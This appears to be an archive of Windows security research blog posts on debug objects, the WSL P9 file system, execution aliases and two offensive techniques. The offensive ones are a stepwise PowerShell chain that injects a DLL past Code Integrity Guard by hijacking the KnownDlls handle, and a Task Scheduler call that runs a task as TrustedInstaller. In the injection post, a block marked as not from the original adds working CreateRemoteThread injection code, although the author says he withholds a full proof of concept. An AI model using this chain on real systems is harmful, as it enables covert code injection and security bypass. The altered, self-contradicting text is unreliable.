
ProcessDebugObjectHandle Anti-Anti-Debug Trick

During my implementation of NT Debug Object support in NtObjectManager (see a related blog here) I added support to open the debug object for a process by using the ProcessDebugObjectHandle process information class. This immediately struck me as something which could be used for anti-debugging, so I did a few searches and sure enough I was right, it's already documented (for example this link).

With that out of the way I went back to doing whatever it was I should have really been doing. Well not really, instead I considered how you could bypass this anti-debug check. This information was harder to find, and typically you just hook NtQueryInformationProcess and change the return values. I wanted to do something more sneaky, so I looked at various examples to see how the check is done. In pretty much all cases the implementation is:

BOOL IsProcessBeingDebugged() {
  HANDLE hDebugObject;
  NTSTATUS status = NtQueryInformationProcess(GetCurrentProcess(),
                                              ProcessDebugObjectHandle,
                                              &hDebugObject,
                                              sizeof(hDebugObject),
                                              NULL);
  if (NT_SUCCESS(status) && hDebugObject) {
    return TRUE;
  }
  return FALSE;
}

The code checks if the query is successful and then whether a valid debug object handle has been returned, returning TRUE if that's the case. This would indicate the process is being debugged. If an error occurs or the debug object handle is NULL, then it indicates the process is not being debugged.

To progress I'd now analyse the logic and find the failure conditions for the detection; fortunately the code isn't very big. We want the function to return FALSE even though a debugger is attached, which means we need to either:

  • Make the query return an error code even though a debugger is attached, or...
  • Let the query succeed but return a NULL handle.
We've reached the limit with what we can do staring at the anti-debug code. We'll dig into the other side, the kernel implementation of the information class. It boils down to a single function:

NTSTATUS DbgkOpenProcessDebugPort(PEPROCESS Process, PHANDLE DebugObject) {
  if (!Process->DebugPort)
    return STATUS_PORT_NOT_SET;
  if (PsTestProtectedProcessIncompatibility(Process, KeGetCurrentProcess())) {
    return STATUS_PROCESS_IS_PROTECTED;
  }
  return ObOpenObjectByPointer(Process->DebugObject, MAXIMUM_ALLOWED,
                               DbgkDebugObjectType, UserMode, DebugObject);
}


There are three failure cases in this code:

  1. If there's no debug port attached then return STATUS_PORT_NOT_SET.
  2. If the process being queried is at a higher protection level than the caller return STATUS_PROCESS_IS_PROTECTED.
  3. Finally open a handle to the debug object and return the status code from the open operation.
For our purposes case 1 is a non-starter as it means the process is not being debugged. Case 2 is interesting, but as the Process object parameter (which comes from the handle passed in the query) will be the same as KeGetCurrentProcess it'd never fail. We're therefore all in on case 3. It turns out that debug objects, like many kernel objects, are securable resources. We can confirm that with NtObjectManager by querying for the DebugObject type and checking its SecurityRequired flag.

PowerShell executing "Get-NtType DebugObject | Select SecurityRequired" and returning True.
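For reference, the check from the screenshot is a one-liner once the NtObjectManager module is imported:

# Query the DebugObject kernel type and check whether its objects always require a security descriptor.
Get-NtType DebugObject | Select SecurityRequired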

If SecurityRequired is true then it means the object must have a security descriptor whether it has a name or not. Therefore we can cause the call to ObOpenObjectByPointer to fail by setting a security descriptor which prevents the process using the anti-debug check opening the debug object and therefore returning FALSE from the check.

To test that we need a debugger and a debuggee. As I do my best to avoid writing new C++ code I converted the anti-debug code to C# using my NtApiDotNet library:


using (var result = NtProcess.Current.OpenDebugObject(false)) {
  if (result.IsSuccess) {
    Console.ForegroundColor = ConsoleColor.Red;
    Console.WriteLine("[ERROR] We're being Debugged, stahp!");
  } else {
    Console.ForegroundColor = ConsoleColor.Green;
    Console.WriteLine("[SUCCESS] Go ahead, we're cool!");
  }
}

I don't bother to check for a NULL handle as the kernel code indicates that can't happen, either you get an error, or you get a valid handle. Anyway it doesn't need to be robust, ..., for me ;-)

For the debugger, again we can write it in C#:

Win32ProcessConfig config = new Win32ProcessConfig();
config.ApplicationName = @"Path\To\Debuggee.exe";
config.CommandLine = "debuggee";
config.CreationFlags = CreateProcessFlags.DebugProcess;

using (var p = Win32Process.CreateProcess(config)) {
  using (var dbg = p.Process.OpenDebugObject()) {
    SecurityDescriptor sd = new SecurityDescriptor("");
    dbg.SetSecurityDescriptor(sd, SecurityInformation.Dacl);
    while (true) {
      var e = dbg.WaitForDebugEvent();
      e.Continue();
      if (e is ExitProcessDebugEvent) {
        break;
      }
    }
  }
}

This code is pretty simple, we create the debuggee process with the DebugProcess flag. When CreateProcess is called the APIs will create a new debug object and attach it to the new process. We can then open the debug object and set an appropriate security descriptor to block the open call in the debuggee. Finally we can just poll the debug object which resumes the target, looping until completion.

What can we set as the security descriptor? The obvious choice would be to set an empty DACL which blocks all access. This is distinct from a NULL DACL which allows anyone access. We can specify an empty DACL in SDDL format using "D:". If you test with an empty DACL the debuggee can still open the debug object; this is because the kernel specified MAXIMUM_ALLOWED, and as the current user is the owner of the object READ_CONTROL and WRITE_DAC access will still be granted. If we're an administrator we could change the owner field (or use a WontFix bug), however instead we'll just specify the OWNER_RIGHTS SID with no access granted. This will block all access for the owner. The SDDL for that is "D:(A;;0;;;OW)".
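As a quick way to compare the two options, here's a minimal PowerShell sketch (assuming the NtObjectManager module is loaded and that New-NtSecurityDescriptor accepts an SDDL string):

# An empty DACL contains no ACEs, but the owner can still be granted
# READ_CONTROL and WRITE_DAC when MAXIMUM_ALLOWED is requested.
$empty = New-NtSecurityDescriptor -Sddl "D:"
$empty.Dacl.Count

# The OWNER_RIGHTS version has a single ACE granting 0 access to the
# OWNER RIGHTS SID, which caps what the object's owner can be granted.
$owner_rights = New-NtSecurityDescriptor -Sddl "D:(A;;0;;;OW)"
$owner_rights.Dacl | Format-List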

If you put this all together yourself you'll find it works as expected. We've successfully circumvented the anti-debug check. Of course this anti-debug technique is unlikely to be used in isolation, so it's not likely to be of much real use.


The anti-debug author is trying to model one state variable, whether a process is being debugged, by observing the state of something else, the success or failure from opening the debug object port. You might assume that as the anti-debug check is directly interacting with a debug artefact then there's a direct connection between the two states. However as I've shown that's not the case, as there are multiple ways the failure case can manifest. The code could be corrected to check explicitly for STATUS_PORT_NOT_SET and only then indicate the process is not being debugged. Of course this behavior is not documented anywhere, and even if it was it could be subject to change.
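As a rough sketch of that corrected check (PowerShell with NtApiDotNet loaded; I'm assuming the returned result object exposes the raw NT status and the opened object via Status and Result properties):

# Only STATUS_PORT_NOT_SET means "no debugger"; any other status, including an
# access denied caused by a hostile security descriptor, is treated as suspicious.
$result = [NtApiDotNet.NtProcess]::Current.OpenDebugObject($false)
if ($result.Status -eq [NtApiDotNet.NtStatus]::STATUS_PORT_NOT_SET) {
    "Not being debugged"
} else {
    "Debugger attached (or someone is tampering with the debug object): $($result.Status)"
}
if ($result.IsSuccess) { $result.Result.Dispose() }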

The problem with the anti-debug code is not that you can set a security descriptor on the debug object and get it to fail, but that the code itself doesn't accurately take into account the thing it's trying to check. This problem demonstrates the fundamental difficulty in writing secure code, specifically:

Any non-trivial program has a state space too large to accurately model in finite time which leads to unexpected or undefined behavior.

Or put another way:

The time constrained programmer writes what works in testing, not what is correct.

While bypassing anti-debug is hardly a major security issue (well unless you write DRM code), the process I followed here is pretty much the same for any of my bugs. I thought it'd be interesting to see my approach to these sorts of problems.

Digging into the WSL P9 File System

Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added that I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis I thought I'd provide an overview of the process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time such as adding support to start Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained, accessing Linux files from Windows applications. You could do it, the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state which in the worst case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog introduced the new feature, accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there are any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to set up an x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success at setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI, instead you need to use the Set-VMComPort PowerShell cmdlet.
  • Installed my tooling, such as NtObjectManager and the SysInternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Installed a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to login to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple, that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but there's sometimes more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or is it only in Explorer? This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether it's a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call will also eliminate the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be that the mini-redirector is implemented in the LXCORE system driver which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool shows the driver doesn't import anything from RDBSS, which would be crucial for the implementation of a mini-redirector.
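For reference, that check is a one-liner (assuming the Visual Studio tools are on the PATH and the driver is in its usual location); no output means no RDBSS import:

c:\> dumpbin /imports c:\windows\system32\drivers\lxcore.sys | findstr /i rdbss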

To find the actual driver name I'll go for the simplest, brute force approach, just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well FINDSTR) for RDBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this. 

We could throw the driver into a disassembler at this point and start RE, but I don't want to go there just yet. Instead, in the spirit of laziness I'll throw the driver into STRINGS and get out all printable debug string information, of which there's likely to be some. I typically use the SysInternals STRINGS rather than the BINUTILS one, as I usually have it installed on any test system and it handles Unicode and ANSI strings with no additional arguments. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here, firstly we can see the WSL$ prefix, this is a good indication that we're in the right place. Second we can see a device name which gives us a good indication that there's expected to be communication from user-mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX" which ties in nicely with our expectation that Unix Sockets are being used.

One thing which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that a file path is how the driver communicates with the socket (I don't even know if Windows supports the "abstract" socket names). Therefore if it is indeed using a file it's not a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, this in turn would likely be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver, which cannot be detected by PROCMON as it never receives the request. However we'll assume that it can be detected; of course if we don't find it we might have to resort to disassembly or kernel debugging after all.

The second assumption is based on the fact the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false as it might mean that we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's a useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, instead we'll do something else. But first gather a trace of a PowerShell session where you execute the Get-NtFile command shown earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols, however as we're only interested in the module on the stack, not the symbol name, we can select to include the stack trace but not symbol resolving. With an exported trace we can now filter the calls using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple, if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select the Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check let's open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest: at the top there are the calls through the AFUNIX driver, which demonstrates that the file is being opened due to a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also now that we know the path we can put this back into PROCMON as a filter, and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is handled entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How are the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, and if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers?
  • Does this file system have any other interesting behaviors?
Some of those things will have to wait for another blog post.









Windows Code Injection: Bypassing CIG Through KnownDlls

TL;DR; This blog post describes a technique to inject a DLL into a process using only Duplicate Handle process access (caveats apply) which will also bypass Code Integrity Guard.

I've been attending Blackhat USA 2019 and watched a presentation by Amit Klein and Itzik Kotler on Windows Process Injection techniques. While I didn't learn anything new from the presentation that you couldn't from just reading Hexacorn's blog it was interesting to see them document what techniques worked against Code Integrity Guard (CIG) and what did not. CIG, if you don't know, is Microsoft's term for blocking non-MS signed DLLs from being loaded into a process. If CIG is enabled on a process then you can't load an arbitrary DLL not signed by Microsoft; instead you'll have to do some sort of shellcode or ROP.

During the presentation I was waiting for the punchline of a technique which bypasses CIG to load an arbitrary DLL, but it never arrived. I'm guessing the researchers don't bother to read my blog posts *sigh*, such as this one on injecting code into Protected Processes through abusing the KnownDlls mechanism. This would also work to bypass CIG if injecting from an external process not under CIG (or Device Guard). All the ways of hijacking the Known DLL loader that I've documented rely on knowing the location of the Known DLLs handle in NTDLL's data section. That's useful when you have little control over the target process and only an arbitrary read/write primitive. For user-mode code injection you're likely to be able to do anything to the process.

Writing a new handle value does have drawbacks if you're thinking about it from a generic code injection perspective. Firstly the location of the handle can (and does) change depending on the version of NTDLL, and secondly if you read and write memory of another process you might as well call your binary malware.exe. Of course writing to memory is not the only way to hijack Known DLLs, you can achieve the same thing with only Duplicate Handle access on the process, which is probably slightly less suspicious.

How can we do this without modifying the handle value? There are 3 key observations we can make that only require Duplicate Handle access:
  1. We can find the existing handle value of the KnownDlls directory by duplicating handles from one process to another and querying for the name.
  2. We can close a handle in another process by specifying DUPLICATE_CLOSE_SOURCE to DuplicateHandle.
  3. The kernel's handle allocator will reuse the handle values so we can replace the original handle with a different object through brute force.
Let's go through how this works in practice. I'm going to show some snippets of PowerShell which use my NtObjectManager module. I'm not going to provide a full end-to-end proof-of-concept however for various reasons.

Step 1: Bring up a process to inject into, the Known DLLs handle is created during the initial loader process before the process entry point is called, so the process must run at least that long. Once we know the Process ID of the process to inject into we can dump all handles in the process and look for anything with the NT type of Directory. Each directory handle can then be duplicated into the current process and inspected. If the name of the directory is "\KnownDlls" we've found our target. In PowerShell we can use my Get-NtHandle cmdlet to dump the handle table, this doesn't require opening the process itself. To get the name we only need PROCESS_DUP_HANDLE access to the target. Here's a basic PS function to get the handle value:

$id = $(Get-Process notepad).Id
$hs = Get-NtHandle -ProcessId $id -ObjectTypes Directory
foreach($h in $hs) {
  if ($h.Name -eq '\KnownDlls') {
    $handle = $h.Handle
    break
  }
}

Step 2: Create an empty object directory and insert into it a named image section object. The name of the section needs to match the name of the system32 DLL we want to hijack. The file backing the section is obviously the DLL you want loaded into the process. Again some code, assuming you've already created the directory 

$dir = New-NtDirectory
$sect = Use-NtObject($f = Get-NtFile -Path "\??\c:\dir\fake.dll") {
    New-NtSection -File $f -SectionAttributes Image `
        -Root $dir -Path "blah.dll" -Protection Execute
}

Step 3: Close the original Known DLLs handle. Again this only needs Duplicate Handle access. At this point you probably also want to suspend the process to ensure something doesn't execute and allocate the handle over the top of your now closed handle. Of course if you suspend the process you'll need a bit more access.

$proc = Get-NtProcess -ProcessId $id -Access DupHandle
Copy-NtObject -SourceHandle $handle -SourceProcess $proc `
                                    -CloseSource

Step 4: Repeatedly duplicate the fake Known DLLs directory you created in step 2 until you get the same handle value as you identified in step 1. If the process is suspended this shouldn't take more than a few tries at worst.

$i = 0
while($i -lt 1000) {
   $h = Copy-NtObject -DestinationProcess $proc -Object $dir
   if ($h -eq $Handle) {
       break
   }
   $i++
}

Step 5: Everything is now set up. The final step is you'll need to get a new library loaded from system32 inside the process. There are a number of possible techniques for this. You could go old-skool and create a new thread in the process calling LoadLibrary. Or you could identify a DLL which you know the process will load in response to a UI or RPC action. For example opening a file in Notepad will spawn the explorer open dialog which pulls in a LOT of new DLLs. Be creative, at least if you don't want to open the process with anything above Duplicate Handle access.
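For completeness, here's a rough, hypothetical sketch of the old-skool option using P/Invoke from PowerShell. None of this is from the original write-up, it needs far more than Duplicate Handle access, and the DLL name and access masks are illustrative only:

# Calls LoadLibraryW("blah.dll") on a new thread in the target; the loader
# resolves the name against KnownDlls first, hitting the fake directory we
# duplicated over the original handle value.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Injector {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode)]
    public static extern IntPtr GetModuleHandle(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    public static extern IntPtr GetProcAddress(IntPtr module, string name);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualAllocEx(IntPtr process, IntPtr address, IntPtr size, uint type, uint protect);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, IntPtr size, out IntPtr written);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr CreateRemoteThread(IntPtr process, IntPtr attributes, IntPtr stackSize, IntPtr start, IntPtr parameter, uint flags, IntPtr threadId);
}
"@

# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION
$target = [Injector]::OpenProcess(0x43A, $false, $id)
# kernel32 is loaded at the same base in every process, so the local address of LoadLibraryW is valid remotely.
$load_library = [Injector]::GetProcAddress([Injector]::GetModuleHandle("kernel32.dll"), "LoadLibraryW")
$dll_name = [System.Text.Encoding]::Unicode.GetBytes("blah.dll`0")
# MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_READWRITE (4)
$remote_buf = [Injector]::VirtualAllocEx($target, [IntPtr]::Zero, [IntPtr]$dll_name.Length, 0x3000, 4)
$written = [IntPtr]::Zero
[Injector]::WriteProcessMemory($target, $remote_buf, $dll_name, [IntPtr]$dll_name.Length, [ref]$written) | Out-Null
[Injector]::CreateRemoteThread($target, [IntPtr]::Zero, [IntPtr]::Zero, $load_library, $remote_buf, 0, [IntPtr]::Zero) | Out-Null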


The question you might be asking is, "Do any AV/Host Detection tools catch this trick?". Honestly I don't know, nor do I care. However it has some things going for it:

  • It doesn't require reading or writing memory from the target process.
  • Inline hooks on LoadLibrary/LdrLoadDll will just see loading a system32 DLL unless they also then query for the mapped file name after the operation has completed.
  • It bypasses CIG, so anyone thinking that'll prevent injection will be surprised.
You could probably make it even more covert, but I'm not going to do so. As I've noted before I'm also not going to write a proof-of-concept or write a tool to do this, you can do it yourself.












The Art of Becoming TrustedInstaller - Task Scheduler Edition

2 years ago I wrote a post about running a process in the TrustedInstaller group. It was pretty well received, and as others pointed out there are many ways of doing the same thing. However in my travels I came across a new way I've not seen documented before, though I'm sure someone will point out where I've missed documentation. As with the previous post, this does require admin privileges; it's not a privilege escalation. Also I tested the behavior I'm documenting on Windows 10 1903. Your mileage may vary on different versions of Windows.

It revolves around the Task Scheduler (obvious by the title I guess), specifically calling the IRegisteredTask::RunEx method exposed by the Task Scheduler COM API. The prototype of RunEx is as follows:

HRESULT RunEx(
  VARIANT      params,
  LONG         flags,
  LONG         sessionID,
  BSTR         user,
  IRunningTask **ppRunningTask
);

The thing we're going to use is the user parameter, which is documented as "The user for which the task runs." Cheers Microsoft! Through a bit of trial and error, and some reverse engineering it's clear the user parameter can take three types of string values:

  1. A normal user account. This can be the name or a SID. The user must be logged on at the time of starting the task as far as I can tell.
  2. The standard system accounts, i.e. SYSTEM, LocalService or NetworkService.
  3. A service account!
Number 3 is the one we're interested in here, it allows you to specify an installed service account, such as TrustedInstaller and the task will run as SYSTEM with the service SID included. Let's try it out.

The advantage of using the user parameter is the task can be registered to run as a normal user, and we'll change it at run time to be more sneaky. In theory you could directly register the task to run as TrustedInstaller, but then it'd be more obvious if anyone went looking. First we need to create a scheduled task, run the following script in PowerShell to create a simple task which will run notepad.

$a = New-ScheduledTaskAction -Execute notepad.exe
Register-ScheduledTask -TaskName 'TestTask' -Action $a

Now we need to call RunEx. While PowerShell has a Start-ScheduledTask cmdlet, neither it nor the schtasks.exe /Run command allows you to specify the user parameter (as an aside, the /U parameter for schtasks does not do what you might think). Instead as the COM API is scriptable we can just run some PowerShell again and use the COM API directly.

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
$task = $folder.GetTask('TestTask')
$task.RunEx($null, 0, 0, $user)

After executing this script you should find a copy of notepad running as SYSTEM with the TrustedInstaller group in the access token.
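To verify, here's a rough sketch using NtObjectManager (exact property names on the group objects may differ slightly between versions):

# Open the primary token of the spawned notepad and list any TrustedInstaller groups.
$p = Get-NtProcess -Name notepad.exe | Select-Object -First 1
$token = Get-NtToken -Primary -Process $p
$token.Groups | Where-Object { $_.Sid.Name -match 'TrustedInstaller' }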


Enjoy responsibly. 

Overview of Windows Execution Aliases

I thought I'd blogged about this topic, however it turns out I hadn't. This blog is in response to a recent Twitter thread from Bruce Dawson on a "fake" copy of Python which Microsoft seems to have force installed on some people's Windows 10 1903 installations. I'll go through the main observation in the thread, that the Python executable is 0 bytes in size, how this works under the hood to start a process, and I'll finish with a dumb TOCTOU bug which still exists in part of the implementation which _might_ be useful as part of an EOP chain.

Execution Aliases for UWP applications were introduced in Windows 10 Fall Creators Update (1709/RS3). For application developers this feature is exposed by adding an AppExecutionAlias XML element to the application's manifest. The manifest information is used by the AppX installer to drop the alias into the %LOCALAPPDATA%\Microsoft\WindowsApps folder, which is also conveniently (or not depending on your POV) added to the user PATH environment variable. This allows you to start a UWP application as if it was a command line application, including passing command line arguments. One example is shown below, which is taken from the WinDbgX manifest.

<uap3:Extension Category="windows.appExecutionAlias" Executable="DbgX.Shell.exe" EntryPoint="Windows.FullTrustApplication">
  <uap3:AppExecutionAlias>
    <desktop:ExecutionAlias Alias="WinDbgX.exe" />
  </uap3:AppExecutionAlias>
</uap3:Extension>

This specifies an execution alias to run DbgX.Shell.exe from the file WinDbgX.exe. If we go to the WindowsApps folder we can see that there is a file with that name, and as mentioned in the Twitter thread it is a 0 byte file. Also if you try and open the file (say using the type command) it fails.

Directory listing of WindowsApps folder showing 0 byte WinDbgX.exe file and showing that trying to open file fails.

How can an empty file result in a process being created? Executing the WinDbgX.exe file inside a shell while running Process Monitor shows some interesting results which I've highlighted below:

Process Monitor output showing opens to WinDbgX with a "REPARSE" result and also a call to get the reparse point data.

The first thing to highlight is the CreateFile calls which return a "REPARSE" result. This is a good indication that the file contains a reparse point. You might assume therefore that this file is a symbolic link to the real target, however a symbolic link would still be possible to open which we can't do. Another explanation is the reparse point is a custom type, not understood by the kernel. This ties in with the subsequent call to FileSystemControl with the FSCTL_GET_REPARSE_POINT code which would indicate some user-mode code is requesting information about the stored reparse point. Looking at the stack trace we can see who's requesting the reparse point data:

Stack trace of FSCTL_GET_REPARSE_POINT showing calls from CreateProcessInternal

The stack trace shows the reparse point data is being queried from inside CreateProcess, through the exported function LoadAppExecutionAliasInfoEx. We can dig into CreateProcessInternal to see how it all works:

HANDLE token = ...;
NTSTATUS status = NtCreateUserProcess(ApplicationName, ..., token);
if (status == STATUS_IO_REPARSE_TAG_NOT_HANDLED) {
  LPWSTR alias_path = ResolveAlias(ApplicationName);
  PEXEC_ALIAS_DATA alias;
  LoadAppExecutionAliasInfoEx(alias_path, &alias);
  status = NtCreateUserProcess(alias.ApplicationName, ..., alias.Token);
}

CreateProcessInternal will first try and execute the path directly, however as the file has an unknown reparse point the kernel fails to open the file with STATUS_IO_REPARSE_TAG_NOT_HANDLED. This status code provides an indicator to take an alternative route: the alias information is loaded from the file's reparse tag using LoadAppExecutionAliasInfoEx and an updated application path and access token are used to start the new process.

What is the format of the reparse point data? We can easily dump the bytes and have a look in a hex editor:

Hex dump of reparse data with highlighted tag.

The first 4 bytes is the reparse tag, in this case it's 0x8000001B which is documented in the Windows SDK as IO_REPARSE_TAG_APPEXECLINK. Unfortunately there doesn't seem to be a corresponding structure, but with a bit of reverse engineering we can work out the format is as follows:

Version: <4 byte integer>
Package ID: <NUL Terminated Unicode String>
Entry Point: <NUL Terminated Unicode String>
Executable: <NUL Terminated Unicode String>
Application Type: <NUL Terminated Unicode String>

The reason we have no structure is probably because it's a serialized format. The Version field seems to be currently set to 3; I'm not sure if other versions were used in earlier Windows 10 releases but I've not seen any. The Package ID and Entry Point are information used to identify the package; an execution alias can't be used like a shortcut for a normal application, it can only resolve to an installed packaged application on the system. The Executable is the real file to execute that'll be used instead of the original 0 byte alias file. Finally Application Type is the type of application being created; while a string it's actually an integer formatted as a string. The integer seems to be zero for desktop bridge applications and non-zero for normal sandboxed UWP applications. I implemented a parser for the reparse data inside NtApiDotNet, you can view it in NtObjectManager using the Get-ExecutionAlias cmdlet.
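For example, pointing it at the WinDbgX alias from earlier (adjust the path for whatever alias you want to inspect):

# Parse the IO_REPARSE_TAG_APPEXECLINK reparse data stored in an execution alias.
Get-ExecutionAlias "$env:LOCALAPPDATA\Microsoft\WindowsApps\WinDbgX.exe"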

Result of executing Get-ExecutionAlias WinDbgX.exe

We now know how the Executable file is specified for the new process creation but what about the access token I alluded to? I actually mentioned this at Zer0Con 2018 when I talked about Desktop Bridge. The AppInfo service (of UAC fame) has an additional RPC service which creates an access token from an execution alias file. This is all handled inside LoadAppExecutionAliasInfoEx but operates similarly to the following diagram:

Operation of RAiGetPackageActivationToken.

